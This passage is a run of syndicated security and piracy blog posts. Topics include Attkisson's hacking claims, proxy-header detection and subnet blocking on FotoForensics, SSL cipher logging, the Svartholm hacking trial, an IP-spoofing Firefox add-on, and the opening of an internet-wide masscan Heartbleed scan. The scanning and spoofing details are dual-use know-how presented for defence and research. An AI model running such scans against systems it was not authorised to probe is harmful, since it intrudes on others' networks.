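    try:
        ipaddress.ip_address(addr)
        return True
    except ValueError:
        return False

print(is_valid_ip("75.748.86.91"))  # False: 748 > 255, impossible octet
print(is_valid_ip("75.74.86.91"))   # True: a syntactically valid IPv4 address
```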

Maybe that’s in her book, along with pictures of the offending cable attached to the FiOS ONT, or pictures of her screen deleting at “hyperspeed”. So far, though, none of those with advance copies have released these details.

Lastly, she’s muzzled the one computer security “expert” that she named in the story so he can’t reveal any technical details, or even defend himself against charges that he’s a quack.

Conclusion

Attkisson’s book isn’t out yet. The source material for this post is from those with advance copies quoting her [1][2]. But everything quoted so far is garbled technobabble from fiction rather than hard technical facts.


Disclosure: Some might believe this post stems from political bias instead of technical expertise. The opposite is true. I’m a right-winger. I believe her accusations that CBS put a left-wing slant on the news. I believe the current administration is suppressing information about the Benghazi incident. I believe journalists with details about Benghazi have been both hacked and suppressed. It’s just that in her case, her technical details sound like a paranoid conspiracy theory.

TorrentFreak: Lawfirm Chasing Aussie ‘Pirates’ Discredited IP Address Evidence

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

There are many explanations for the existence of online piracy, from content not being made available quickly enough to it being sold at ripoff prices. Unfortunately for Australians, over the years most of these complaints have had some basis in fact.

The country is currently grappling with its piracy issues and while there’s hardly a consensus of opinion right now, most of the region’s rightsholders feel that suing the general public isn’t the way to go. It’s painful for everyone involved and doesn’t solve the problem.

That said, US-based Dallas Buyers Club LLC are not of the same opinion. They care about money and to that end they’re now attempting to obtain the identities of iiNet users for the purpose of extracting cash settlements from them.

Yesterday additional information on the case became available. An Optus spokeswoman told SMH that it had been contacted by Dallas Buyers Club about handing over subscriber data but its legal representatives had backed off when it was denied. The movie outfit didn’t even try with Telstra – but why?

So-called copyright trolls like the easiest possible fight and through iiNet they know their adversaries just that little bit better. According to Anny Slater of Slaters Intellectual Property Lawyers, documents revealed in the ISP’s earlier fight with Village Roadshow show that Telstra could well be a more difficult target for discovery.

The business model employed by plaintiffs such as Dallas Buyers Club LLC (DBCLLC) requires a minimum of difficulty, since difficulties increase costs and decrease profits. To that end, part of the job of keeping things straightforward will fall to DBCLLC’s lawfirm, Sydney-based Marque Lawyers.

Unfortunately for DBCLLC, Marque Lawyers have already shot themselves in the foot when it comes to convincing DBCLLC’s “pirate” targets to “pay up or else.”

In 2012, Marque published a paper titled “It wasn’t me, it was my flatmate! – a defense to copyright infringement?” which detailed the company’s stance on file-sharing accusations. The publication provided a short summary of cases in the US where porn companies were aiming to find out the identities of people who had downloaded their films, just as Dallas Buyers Club – Marque’s clients – are doing now.

“To find out the actual identities of the users, the [porn companies] asked the Court to force the ISPs to reveal the names and addresses of each of the subscribers to which the IP addresses related. The users went on the attack and won,” Marque explained.

And here’s the line all potential targets of Dallas Buyers Club and Marque Lawyers should be aware of – from the lawfirm’s own collective mouth.

“The judge, rightly in our view, agreed with the users that just because an IP address is in one person’s name, it does not mean that that person was the one who illegally downloaded the porn.

As the judge said, an IP address does not necessarily identify a person and so you can’t be sure that the person who pays for a service has necessarily infringed copyright.

This decision makes a lot of sense to us. If it holds up, copyright owners will need to be a whole lot more savvy about how they identify and pursue copyright infringers and, perhaps, we’ve seen the end of the mass ‘John Doe’ litigation.”

So there you have it. Marque Lawyers do not have faith in the IP address-based evidence used in mass file-sharing litigation. In fact, they predict that weaknesses in IP address evidence might even signal the end of mass lawsuits.

Sadly they weren’t right in their latter prediction, as their partnership with Dallas Buyers Club reveals. Still, their stance that the evidence is weak remains and will probably come back to bite them.

The document is available for download from Marque’s own server. Any bill payers wrongly accused of piracy by the company in the future may like to refer the lawfirm to its own literature as part of their response.


The Hacker Factor Blog: By Proxy

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

As I tweak and tune the firewall and IDS system at FotoForensics, I keep coming across unexpected challenges and findings. One of the challenges is related to proxies. If a user uploads prohibited content from a proxy, then my current system bans the entire proxy. An ideal solution would only ban the user.

Proxies serve a lot of different purposes. Most people think about proxies in regards to anonymity, like the TOR network. TOR is a series of proxies that ensure that the endpoint cannot identify the starting point.

However, there are other uses for proxies. Corporations frequently have a set of proxies for handling network traffic. This allows them to scan all network traffic for potential malware. It’s a great solution for mitigating the risk from one user getting a virus and passing it to everyone in the network.

Some governments run proxies as a means to filter content. China and Syria come to mind. China has a custom solution that has been dubbed the “Great Firewall of China“. They use it to restrict site access and filter content. Syria, on the other hand, appears to use a COTS (commercial off-the-shelf) solution. In my web logs, most traffic from Syria comes through Blue Coat ProxySG systems.

And then there are the proxies that are used to bypass usage limits. For example, your hotel may charge for Internet access. If there’s a tech convention in the hotel, then it’s common to see one person pay for the access, and then run his own SOCKS proxy for everyone else to relay out over the network. This gives everyone access without needing everyone to pay for the access.

Proxy Services

Proxy networks that are designed for anonymity typically don’t leak anything. If I ban a TOR node, then that node stays banned, since I cannot identify individual users. However, proxies that are designed for access typically do reveal something about the user. In fact, many proxies explicitly identify whose request is being relayed. This added information is stuffed into HTTP header fields that most web sites ignore.

For example, I recently received an HTTP request from 66.249.81.4 that contained the HTTP header “X-Forwarded-For: 82.114.168.150″. If I were to ban the user, then I would ban “66.249.81.4”, since that system connected to my server. However, 66.249.81.4 is google-proxy-66-249-81-4.google.com and is part of a proxy network. This proxy network identified who was relaying with the X-Forwarded-For header. In this case, “82.114.168.150” is someone in Yemen. If I see this reference, then I can start banning the user in Yemen rather than the Google Proxy that is used by lots of people. (NOTE: I changed the Yemen IP address for privacy, and this user didn’t upload anything requiring a ban; this is just an example.)

Unfortunately, there is no real standard here. Different proxies use different methods to denote the user being relayed. I’ve seen headers like “X-Forwarded”, “X-Forwarded-For”, “HTTP_X_FORWARDED_FOR” (yes, they actually sent this in their header; this is NOT from the Apache variable), “Forwarded”, “Forwarded-For-IP”, “Via”, and more. Unless I know to look for it, I’m liable to ban a proxy rather than a user.
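The header hunt just described can be sketched as a simple lookup. The header names are the variants mentioned above; real proxies may use still others, and the standard `Forwarded` header technically uses a richer `for=` syntax than this sketch handles:

```python
# Minimal sketch: hunt through known "relayed client" header variants and
# return the first relayed address found, so the user (not the proxy) can
# be banned. Header names are the ones observed in the article.
FORWARD_HEADERS = [
    "X-Forwarded-For", "X-Forwarded", "HTTP_X_FORWARDED_FOR",
    "Forwarded-For-IP", "Forwarded", "Via",
]

def relayed_client(headers: dict):
    """Return the first relayed-client value found, else None."""
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in FORWARD_HEADERS:
        value = lowered.get(name.lower())
        if value:
            # X-Forwarded-For may carry a chain of relays; by convention
            # the left-most entry is the original client.
            return value.split(",")[0].strip()
    return None

print(relayed_client({"X-Forwarded-For": "192.0.2.150"}))  # 192.0.2.150
print(relayed_client({"User-Agent": "Mozilla/5.0"}))       # None
```

If this returns an address, ban that; otherwise fall back to banning the connecting IP.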

In some cases, I see the direct connection address also listed as the relayed address; the proxy claims to be relaying itself. I suspect that this is caused by some kind of anti-virus system that filters network traffic through a local proxy. And sometimes I see private addresses (“private” as in “private use” and “should not be routed over the Internet”; not “don’t tell anyone”). These are likely home users or small companies that run a proxy for all of the computers on their local networks.

Proxy Detection

If I cannot identify the user being proxied, then just identifying that the system is a proxy can be useful. Rather than banning known proxies for three months, I might ban the proxy for only a day or a week. The reduced time should cut down on the number of people blocked because of the proxy that they used.

There are unique headers that can identify that a proxy is present. Blue Coat ProxySG, for example, adds in a unique header: “X-BlueCoat-Via: abce6cd5a6733123″. This tracking ID is unique to the Blue Coat system; every user relaying through that specific proxy gets the same unique ID. It is intended to prevent looping between Blue Coat devices. If the ProxySG system sees its own unique ID, then it has identified a loop.

Blue Coat is not the only vendor with their own proxy identifier. Fortinet’s software adds in a “X-FCCKV2″ header. And Verizon silently adds in an “X-UIDH” header that has a large binary string for tracking users.
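Even when the relayed user cannot be recovered, these vendor fingerprints at least flag the source as a proxy, which is enough to choose the shorter ban. A sketch, using only the three vendor headers named above:

```python
# Detect that a request came *through* a known proxy product, even when
# the user behind it cannot be identified, so the ban can be shortened.
PROXY_FINGERPRINTS = {"x-bluecoat-via", "x-fcckv2", "x-uidh"}

def is_known_proxy(headers: dict) -> bool:
    """True if any vendor-specific proxy marker header is present."""
    return any(k.lower() in PROXY_FINGERPRINTS for k in headers)

print(is_known_proxy({"X-BlueCoat-Via": "abce6cd5a6733123"}))  # True
print(is_known_proxy({"Accept": "text/html"}))                 # False
```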

Language and Location

Besides identifying proxies, I can also identify the user’s preferred language.

The intent with specifying languages in the HTTP header is to help web sites present content in the native language. If my site supports English, German, and French, then seeing a hint that says “French” should help me automatically render the page using French. However, this can be used along with IP address geolocation to identify potential proxies. If the IP address traces to Australia but the user appears to speak Italian, then it increases the likelihood that I’m seeing an Australian proxy that is relaying for a user in Italy.

The official way to identify the user’s language is to use an HTTP “Accept-Language” header. For example, “Accept-Language: en-US,en;q=0.5″ says to use the United States dialect of English, or just English if there is no dialect support at the web site. However, there are unofficial approaches to specifying the desired language. For example, many web browsers encode the user’s preferred language into the HTTP user-agent string.
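Parsing the official header is mechanical: entries are comma-separated, each optionally weighted with a q-value defaulting to 1.0. A small sketch; real-world values can be messier (extra parameters, invalid q-values) than handled here:

```python
# Parse an Accept-Language header into (language, quality) pairs,
# highest preference first. "en-US,en;q=0.5" is the example from above.
def parse_accept_language(value: str):
    langs = []
    for part in value.split(","):
        pieces = part.strip().split(";q=")
        q = float(pieces[1]) if len(pieces) == 2 else 1.0  # default quality is 1.0
        langs.append((pieces[0], q))
    return sorted(langs, key=lambda lq: -lq[1])

print(parse_accept_language("en-US,en;q=0.5"))
# [('en-US', 1.0), ('en', 0.5)]
```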

Similarly, Facebook can relay network requests. These appear with the header “X-Facebook-Locale”. This is an unofficial way to identify when Facebook is being used as a proxy. However, it also tells me the user’s preferred language: “X-Facebook-Locale: fr_CA”. In this case, the user prefers the Canadian dialect of French (fr_CA). While the user may be located anywhere in the world, he is probably in Canada.

There’s only one standard way to specify the recipient’s language. However, there are lots of common non-standard ways. Just knowing what to look for can be a problem. But the bigger problem happens when you see conflicting language definitions.

Accept-Language: de-de,de;q=0.5

User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; it-it; SAMSUNG SM-G900F/G900FXXU1ANH4 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36

X-Facebook-Locale: es_LA

x-avantgo-clientlanguage: en_GB

x-ucbrowser-ua: pf(Symbian);er(U);la(en-US);up(U2/1.0.0);re(U2/1.0.0);dv(NOKIAE90);pr(UCBrowser/9.2.0.336);ov(S60V3);pi(800*352);ss(800*352);bt(GJ);pm(0);bv(0);nm(0);im(0);sr(2);nt(1)

X-OperaMini-Phone-UA: Mozilla/5.0 (Linux; U; Android 4.4.2; id-id; SM-G900T Build/id=KOT49H.G900SKSU1ANCE) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30

If I see all of these in one request, then I’ll probably choose the official header first (German from Germany). However, without the official header, would I choose Spanish from Latin America (“es_LA” is unofficial but widely used), Italian from Italy (it-it) as specified by the web browser user-agent string, or the language from one of the other fields? (Fortunately, in the real world these would likely all be the same, and you’re unlikely to see most of these fields together. Still, I have seen some conflicting fields.)
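One way to encode that precedence is a ranked list of fields: trust the official header when present, then fall back through the unofficial ones. The field names are the ones shown above; the exact ordering of the fallbacks is my own judgment call:

```python
# Pick the best language hint from possibly conflicting header fields.
# The official Accept-Language header always wins when present.
PRECEDENCE = [
    "Accept-Language",           # official, wins when present
    "X-Facebook-Locale",         # unofficial Facebook relay hint
    "x-avantgo-clientlanguage",  # other unofficial fields follow
]

def best_language_hint(headers: dict):
    """Return (field, value) for the highest-precedence hint, else None."""
    lowered = {k.lower(): v for k, v in headers.items()}
    for name in PRECEDENCE:
        if name.lower() in lowered:
            return name, lowered[name.lower()]
    return None

print(best_language_hint({
    "X-Facebook-Locale": "es_LA",
    "Accept-Language": "de-de,de;q=0.5",
}))  # ('Accept-Language', 'de-de,de;q=0.5')
```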

Time to Program!

So far, I have identified nearly a dozen different HTTP headers that denote some kind of proxy. Some of them identify the user behind the proxy, but others leak clues or only indicate that a proxy was used. All of this can be useful for determining how to handle a ban after someone violates my site’s terms of service, even if I don’t know who is behind the proxy.

In the near future, I should be able to identify at least some of these proxies. If I can identify the people using proxies, then I can restrict access to the user rather than the entire proxy. And if I can at least identify the proxy, then I can still try to lessen the impact for other users.

SANS Internet Storm Center, InfoCON: green: Logging SSL, (Thu, Oct 16th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

With POODLE behind us, it is time to get ready for the next SSL fire drill. One of the questions that keeps coming up is which ciphers and SSL/TLS versions are actually in use. Whether you can turn off SSLv3 depends a lot on who still needs it, and it is an important answer to have ready should some other cipher turn out to be too weak tomorrow.

But keep in mind that it is not just numbers that matter. You also need to figure out who the outliers are and how important (or dangerous?) they are. So as a good start, try to figure out how to log SSL/TLS versions and ciphers. There are a couple of options to do this:

In Apache, you can log the protocol version and cipher easily by logging the respective environment variables [1]. For example:

CustomLog logs/ssl_request_log "%t %h \"%{User-agent}i\" %{SSL_PROTOCOL}x %{SSL_CIPHER}x"

This logs the SSL protocol and cipher. You can add this to an existing access log, or create a new log. If you decide to log this in its own log, I suggest you add the User-Agent and IP address (as well as a time stamp).

In nginx, you can do the same by adding $ssl_cipher and $ssl_protocol to the log_format directive in your nginx configuration. For example:

log_format ssl '$remote_addr "$http_user_agent" $ssl_cipher $ssl_protocol';

This should give you a similar result as for Apache above.

If you have a packet sniffer in place, you can also use tshark to extract the data. With tshark, you can actually get a bit further: you can log the client hello with whatever ciphers the client proposed, and the server hello, which will indicate which cipher the server picked.

tshark -r ssl -2 -R "ssl.handshake.type==2 or ssl.handshake.type==1" -T fields -e ssl.handshake.type -e ssl.record.version -e ssl.handshake.version -e ssl.handshake.ciphersuite

For extra credit log the host name requested in the client hello via SNI and compare it to the actual host name the client connects to.

Now you can not only collect real data as to which ciphers are needed, but you can also look for anomalies. For example: user agents that request very different ciphers than other connections claiming to originate from the same user agent. Or who is asking for weak ciphers? Maybe a sign of an SSL downgrade attack? Or an attack tool using an older SSL library…
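The anomaly hunt suggested above reduces to grouping log lines by user agent and flagging agents seen with more than one negotiated cipher. A sketch; the log tuples are invented examples in the (user_agent, cipher) shape the Apache/nginx formats above would produce:

```python
# Count which cipher each user agent negotiates, then flag agents that
# show up with more than one cipher -- a possible downgrade attack or an
# attack tool reusing a browser's user-agent string.
from collections import defaultdict

def cipher_outliers(records):
    seen = defaultdict(set)
    for user_agent, cipher in records:
        seen[user_agent].add(cipher)
    return {ua: ciphers for ua, ciphers in seen.items() if len(ciphers) > 1}

log = [
    ("Mozilla/5.0", "ECDHE-RSA-AES128-GCM-SHA256"),
    ("Mozilla/5.0", "ECDHE-RSA-AES128-GCM-SHA256"),
    ("Mozilla/5.0", "RC4-SHA"),            # same UA, suddenly a weak cipher
    ("curl/7.38",   "AES256-SHA"),
]
print(cipher_outliers(log))  # flags Mozilla/5.0 with its two ciphers
```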

[1] http://httpd.apache.org/docs/2.2/mod/mod_ssl.html#logformats


Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn


TorrentFreak: Anti-Piracy Group Plans to Block In Excess of 100 Sites

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

When copyright holders turn to the courts for a solution to their problems it’s very rare that dealing with one site, service or individual is the long-term aim. Legal actions are designed to send a message, and important decisions in rightsholders’ favor often open the floodgates for yet more action.

This is illustrated perfectly by the march towards large-scale website blocking in several regions around the world.

A topic pushed off the agenda in the United States following the SOPA debacle, web blockades are especially alive and well in Europe and are living proof that while The Pirate Bay might have been the initial target of Hollywood and the record labels, much bigger plans have always been in store.

A typical example is now emerging in Austria. Having spent years trying to have streaming sites Kino.to, Kinox.to and Movie4K blocked at the ISP level, anti-piracy group VAP has just achieved its aims. Several key local ISPs began blocking the sites this month, but the Hollywood-affiliated group has now admitted that it has had bigger plans in mind all along.

Speaking with DerStandard, VAP CEO Werner Müller has confirmed that his group will now work to have large numbers of additional sites banned at the ISP level.

Using a term often used by Dutch anti-piracy group BREIN, Müller says his group has compiled a list of sites considered by the movie industry to be “structurally infringing”. The sites are expected to be the leaders in the torrent, linking and streaming sector, cyberlockers included. IFPI has already confirmed it will be dealing with The Pirate Bay and two other sites.

The VAP CEO wouldn’t be drawn on exact numbers, but did confirm that a “low three digit” number of domains are in the crosshairs for legal action.

Although Austria is in the relatively early stages, a similar situation has played out in the UK, with rightsholders obtaining blocks against some of the more famous sites and then streamlining the process to add new sites whenever they see fit. Dozens of sites are now unavailable by regular means.

If VAP has its way the blockades in Austria will be marginally broader than those in the UK, covering the country’s eight largest service providers and around 95% of subscribers.

Of course, whenever web blockades are mentioned the topic of discussion turns to circumvention. In Austria the blockades are relatively weak, with only DNS-based mitigation measures in place. However, VAP predicts the inevitable expansion towards both DNS and IP address blocking and intends to head off to court yet again to force ISPs to implement them.

Describing the Internet as a “great machine” featuring good and bad sides, Müller says that when ordering website blocks the courts will always take the right to freedom of expression into account.

“But there’s no human right to Bruce Willis,” he concludes.


TorrentFreak: Gottfrid Svartholm Hacking Trial Nears Conclusion

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

The hacking trial of Gottfrid Svartholm and his alleged 21-year-old Danish accomplice concluded this week in Copenhagen, Denmark. Gottfrid is best known as one of the founders of The Pirate Bay, but his co-defendant’s identity is still being kept out of the media.

The sessions this week, on October 7 and 10, were used for summing up by the prosecution and defense. Danish language publication DR.dk, which has provided good coverage of the whole trial, reports that deputy prosecutor Anders Riisager used an analogy to describe their position on Gottfrid.

Prosecution: Hands in the cookie jar

“If there is a cookie jar on the table with the lid removed, and your son is sitting on the sofa with cookie crumbs on his mouth, it is only reasonable to assume that it is he who has had his paws in the cookie jar,” he said.

“This, even though he claims it is four of his friends who have put the cookies into his mouth. And especially when the son will not reveal who his friends are, or how it happened.”

Riisager was referring to the evidence presented by the prosecution that Gottfrid and his co-defendant were the people behind hacker attacks on IT company CSC which began in 2012.

The Swede insists that while the attack may have been carried out from his computer, the computer itself was used remotely by other individuals, any of whom could have carried out the attacks. Leads and names provided by Gottfrid apparently led the investigation nowhere useful.

Remote access unlikely

That third-parties accessed Gottfrid’s computer without his knowledge is a notion rejected by the prosecution. Noting that the Pirate Bay founder is a computer genius, senior prosecutor Maria Cingari said that maintaining secret access to his machine over extended periods would not have been possible.

“It is not likely that others have used [Gottfrid’s] computer to hack CSC without him discovering something. At the same time the hack occurred over such a long time that remote control is unlikely,” she said.

And, Cingari noted, it was no coincidence that chatlogs found on Gottfrid’s computer related to so-called “zero-day” vulnerabilities and the type of computer systems used by CSC.

Dane and Swede working together

In respect of Gottfrid’s co-defendant, the prosecution said that the 21-year-old Dane knew that when he was speaking online with a user known as My Evil Twin (allegedly Gottfrid), the plan was a hacker attack on CSC.

Supporting their allegations of collusion, the prosecution noted that the Dane had been living in Cambodia when the attacks on CSC began and while a hacker attack against Logica, a crime for which Gottfrid was previously sentenced, was also underway. The Dane spent time in a café situated directly under Gottfrid’s apartment, the prosecution said.

Why not hand over the encryption keys?

When police raided the Dane they obtained a laptop, the contents of which still remain a secret due to the presence of heavy encryption. The police found a hollowed-out chess piece containing the computer’s SD card, but that didn’t help them gain access. Despite several requests, the 21-year-old has refused to provide keys to unlock the data on the Qubes OS device, arguing there is nothing of significance on it. According to the prosecution, this is a sign of guilt.

“It is very striking that one chooses to sit in prison for a year and more, instead of just helping the police with access to the laptop so they can see that it contains nothing,” senior prosecutor Maria Cingari said.

Cingari also pointed the finger at the Dane for focusing Gottfrid’s attention on CSC.

“You can see that [the Dane] has very much helped [Gottfrid] with obtaining access to CSC’s mainframe. It is not even clear that he would have set his sights on CSC, if it had not been for [the Dane],” she said.

Defense: No objectivity

On Friday, defense lawyer Luise Høj began her closing arguments with fierce criticism of a Danish prosecution that uncritically accepted evidence provided by Swedish police and failed to conduct an objective inquiry.

“They took a plane to Stockholm and were given some material. It was placed in a bag and they took the plane back home. From there they went to CSC and asked them to look for clues. This shows a lack of an independent approach to the evidence,” she said.

Furthermore, the mere fact that CSC had been investigating itself under direction of the police was also problematic.

“The victim should not investigate itself. CSC is at risk of being fired as the state’s IT provider,” Høj noted.

Technical doubt

Computer technicians presented by both sides, including famous security expert Jacob Appelbaum, failed to agree on whether remote access had been a possibility, but this in itself should sway the court to acquit, Høj said.

“It must be really difficult for the court to decide whether the computer was controlled remotely or not, when even engineers disagree on what has happened,” she noted.

Why not take time to investigate properly?

Høj also took aim at the police who she said had failed to properly investigate the people Gottfrid had previously indicated might be responsible for the hacker attacks.

“My client has in good faith attempted to come up with some suggestions as to how his computer was remotely controlled. Of course he did not provide a complete explanation of how it happened, as he did not know what had happened and he has not had the opportunity to examine his computer,” she said.

Additionally, clues that could’ve led somewhere were overlooked, the defense lawyer argued. For instance, an IP address found in CSC’s logs was traced back to a famous Swedish hacker known as ‘MG’.

“The investigation was not objective. I do not understand why it’s not possible to investigate clues that don’t take much effort to be investigated,” Høj said. “The willingness to investigate clues that do not speak in favor of the police case has been minimal.”

A decision in the case is expected at the end of the month. If found guilty, Gottfrid faces up to four years in jail.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

The Hacker Factor Blog: Bellwether

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

For the last few months, I have been seeing a huge up-tick on two kinds of traffic: spam and network attacks. Over the last few weeks, I have realized that they are directly related.

“I don’t want any SPAM!” — Monty Python

I used to take pride in my ability to stay off spam mailing lists. For over 12 years, I have averaged 4-8 spam messages per day without using any kind of mail filters. That all changed earlier this year, when I suddenly began getting about 50 undesirable emails per day. That’s when I first enabled the commonly used mail filter called spamassassin.

Although spamassassin reduced the flood by 50%, some spam still got through. Meanwhile the amount of spam dramatically increased from 50 messages per day to 500 or more per day. I tweaked a couple of the spamassassin rules and added in some procmail rules at the final mailbox. Now I’m down to a few hundred per day getting past spamassassin and about 10 per day that make it past my procmail rules.

The good news is that I am very confident that I am not losing any legitimate emails. The bad news is that spammers seem to be seriously upping the volume since at least March of this year.

Each time I register with a new online service, I try to use a different email address. This way, if any service I use has their list acquired by spammers, then I know which service caused the problem. Unfortunately, most of these messages are not going to my service-specific addresses. Instead, they are going to one of my three primary accounts that I give out to people. I suspect that someone I know got infected and had their address list stolen.
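One common way to implement this per-service trick is plus-addressing, which many mail servers support by delivering user+tag@domain to user’s mailbox. A small sketch (the names here are hypothetical):

```python
def tagged_address(mailbox: str, domain: str, service: str) -> str:
    """Build a service-specific address like user+someshop@example.com.

    If spam later arrives at the tagged address, the tag identifies
    which service leaked (or sold) its list.
    """
    tag = "".join(c for c in service.lower() if c.isalnum())
    return f"{mailbox}+{tag}@{domain}"

addr = tagged_address("neal", "example.com", "Some Shop")
print(addr)  # neal+someshop@example.com
```

The catch, as noted above, is that spam sent to a primary, untagged address tells you nothing about which party leaked it.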

These high-volume spam messages are coming from specific subnets. It appears that 2-3 spam groups are purchasing subnets from small hosting providers and then spamming like crazy until they get shut down. Moreover, the hosting providers appear to be ignoring complaints and permitting the abuse. So far, I have banned all emails from 191.101.xx.xx, 192.3.xx.xx, 103.252.xx.xx, 204.15.135.xx, and 209.95.38.xx. These account for over 800 emails to me over the last month.
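Checking an incoming address against banned ranges like these is straightforward with Python’s ipaddress module. The prefix lengths below are inferred from the “xx” notation above (a sketch, not my actual filter):

```python
import ipaddress

# Banned ranges from the post; /16 and /24 prefixes inferred from the "xx" notation.
BANNED = [ipaddress.ip_network(n) for n in (
    "191.101.0.0/16", "192.3.0.0/16", "103.252.0.0/16",
    "204.15.135.0/24", "209.95.38.0/24",
)]

def is_banned(ip: str) -> bool:
    """True if the address falls inside any banned subnet."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in BANNED)

assert is_banned("192.3.45.6")
assert is_banned("204.15.135.200")
assert not is_banned("8.8.8.8")
```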

I’m not the only person seeing this large increase in spam. There have been similar reports at forums like Symantec and Ars Technica. According to Cisco, spam has increased more than 3x since 2013.

“Oh, what a tangled web we weave when first we practise to deceive!” — Walter Scott

Coinciding with the increase in spam is an increase in web attacks. I have seen nearly a 3x increase in web-based scans and attacks in the last year. Because of this, I have added additional filters to identify these attacks and block the offending addresses.

Using data collected at FotoForensics, I began to look up the banned IP addresses using over 30 different dnsbl sites. About 40% of the time, the address is already associated with suspicious web activity (e.g., port scanning and attacks), and 70% of the time it is already associated with spam.

I have graphed out the attackers over the last 75 days. The size of the dot represents the percent of traffic. Red denotes cities and yellow denotes countries (when the city is unknown). Mousing-over the picture shows the per-country distribution.

Since I am blocking access immediately, there is only one attack recorded per IP address. If a city or country has multiple sightings, then those are multiple addresses that geolocated to the same city/country.

Although the United States generates the largest number of network attacks, they really come from cities all over the place. There is no central city. The eight cities that generate the most attacks are Hanoi (Vietnam), Fuzhou (China), Guangzhou (China), Bangkok (Thailand), Nanjing (China), Taipei (Taiwan), Istanbul (Turkey), and Chongqing (China).

The top 10 countries that have attacked my sites are: USA (with 70 sightings), China (62), Germany (42), Ukraine, Thailand, Vietnam, South Korea, India, Taiwan, and Turkey.

Most of these attacks appear to come from subnets. For example, Hetzner Online AG (AS24940) has two subnets that are explicitly used for network attacks: 88.198.160.50 – 88.198.160.61 and 88.198.247.163 – 88.198.247.170. Every IP address in these ranges has explicitly conducted a web-based attack against my server.

By detecting these attacks and blocking access immediately, I’ve seen one other side-effect: a huge (20%) drop in volume from other network addresses. The attacks that I am blocking appear to be bellwethers; if these attacks are not blocked then others will follow. Blocking the bellwether stops the subsequent scans and attacks from other network addresses. This theory was easy enough to test: rather than banning, I just recorded a few of the network attacks and allowed them to continue. This resulted in an increase in attacks from other countries and subnets. Blocking the attacks caused a direct drop in hostile traffic from all over the place.

“Coincidence is God’s way of remaining anonymous.” — Albert Einstein

While I was collecting information on attackers, I tested a few other types of online tracking. For example, it is easy enough for my server to identify if the recipient is using an anonymizing network. I wanted to see if attacks correlated with these systems. Amazingly, the distribution of attacks from anonymous proxies is not significantly different from non-proxy addresses. I could find no correlation.

Here’s the locations of detected anonymizers that accessed my site. This also includes botnets that distribute links to scan across network addresses. Again, each IP address is only counted once:

When it comes to anonymity, we’re mapping the anonymous exit address to a location. With TOR users, you may be physically in France but using an address in Australia. We would count it as Australia and not France. Amazingly, there are not many TOR nodes in this graph. (Probably because many TOR nodes have been banned for being involved in network attacks.)

In these maps, you’ll also notice a yellow dot in the water off the west coast of Africa. That’s latitude,longitude “0,0” and denotes addresses that cannot be mapped back to countries. These are completely anonymous servers and satellite providers. (But keep in mind: just because your server cannot be geolocated, it does not mean that you are truly anonymous.)

The big dots in California are from Google and Microsoft. Their bots appear because they constantly change addresses (like TOR users). The big dot in Japan is Trend Micro. However, the single biggest group of anonymity users are in Saudi Arabia. They change addresses and anonymize HTTP headers like crazy! Asia is also really big on anonymizing systems. I assume that this is because their users are either trying to bypass government filters or are unaware that their traffic is being hijacked by government filters. In contrast, Germany and Poland appear big due to the sheer number of TOR nodes.

Finally, I tried to correlate the use of network attacks or anonymity systems to people who upload prohibited content to FotoForensics.

There is really no correlation at all. The more conservative areas, like Saudi Arabia, most of the Middle East, and Asia, rarely upload pornography, nudity, or sexually explicit content. In contrast, the United States and Europe really like their porn. (Germany is mostly due to the >_ forum that I previously mentioned. Even when shown a warning that they are about to be banned, nearly 80% of the time they consciously choose to continue and get banned. Idiots.)

“It is madness for sheep to talk peace with a wolf.” — Thomas Fuller

By actively blocking the initial bellwether network scans, I have seen that it dramatically reduces the number of follow-up attacks. Overall, I see a significant drop in scans, harvesters, and even comment spammers. Since these addresses are associated with unsolicited email, immediately stopping them from accessing the web server should result in an immediate drop in the volume of spam.

I have since deployed my blocking technology from fotoforensics.com at hackerfactor.com. In the last four days, it blocked over 300 network addresses that were scanning for vulnerabilities, uploading comment-spam, and searching for network addresses.

However, FotoForensics and HackerFactor.com are very small web sites compared to most other online services. Any impact from my own blocking is likely to be insignificant across the whole world. Still, it does demonstrate one finding related to spam: there is a direct correlation between web-based scans and attacks, and systems that generate spam emails. If big companies temporarily block access when a hostile scan is detected, then the overall volume of spam across the world should be rapidly reduced.

Darknet - The Darkside: IPFlood – Simple Firefox Add-on To Hide Your IP Address

This post was syndicated from: Darknet - The Darkside and was written by: Darknet. Original post: at Darknet - The Darkside

IPFlood (previously IPFuck) is a Firefox add-on created to simulate the use of a proxy. It doesn’t actually change your IP address (obviously) and it doesn’t connect to a proxy either, it just changes the headers (that it can) so it appears to any web servers or software sniffing – that you are in fact […]

The post IPFlood…

Read the full post at darknet.org.uk

Errata Security: Six-month anniversary scan for Heartbleed

This post was syndicated from: Errata Security and was written by: Robert Graham. Original post: at Errata Security

I just launched my six-month anniversary scan for Heartbleed. I’ll start reporting early results tomorrow afternoon. I’m dialing the scan to run slowly and spreading it across four IP addresses (and 32k ports) in order to avoid unduly alarming people.

If you would like the results of the scan for your subnet, send your address ranges to our “abuse@” email address. We’ll look up the abuse contact email for those ranges and send you what we found for that range. (This offer is good through the end of October 2014).

Here is a discussion of the options.

--conf /etc/masscan/masscan.conf
You don’t see this option, but it’s the default. This is where we have the ‘excluderanges’ configured. Because we exclude everyone who contacts us and “opts out” of our white-hat scans, we are down to scanning only 3.5 billion hosts now, out of around 4 billion.

0.0.0.0/0
The “/0” means “the entire Internet”. Actually, any valid IPv4 address can replace the 0.0.0.0 and it’ll produce the same results, such as “127.0.0.0/0” to amuse your friends.
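This claim is easy to verify with Python’s ipaddress module (strict=False is needed because 127.0.0.0/0 has host bits set):

```python
import ipaddress

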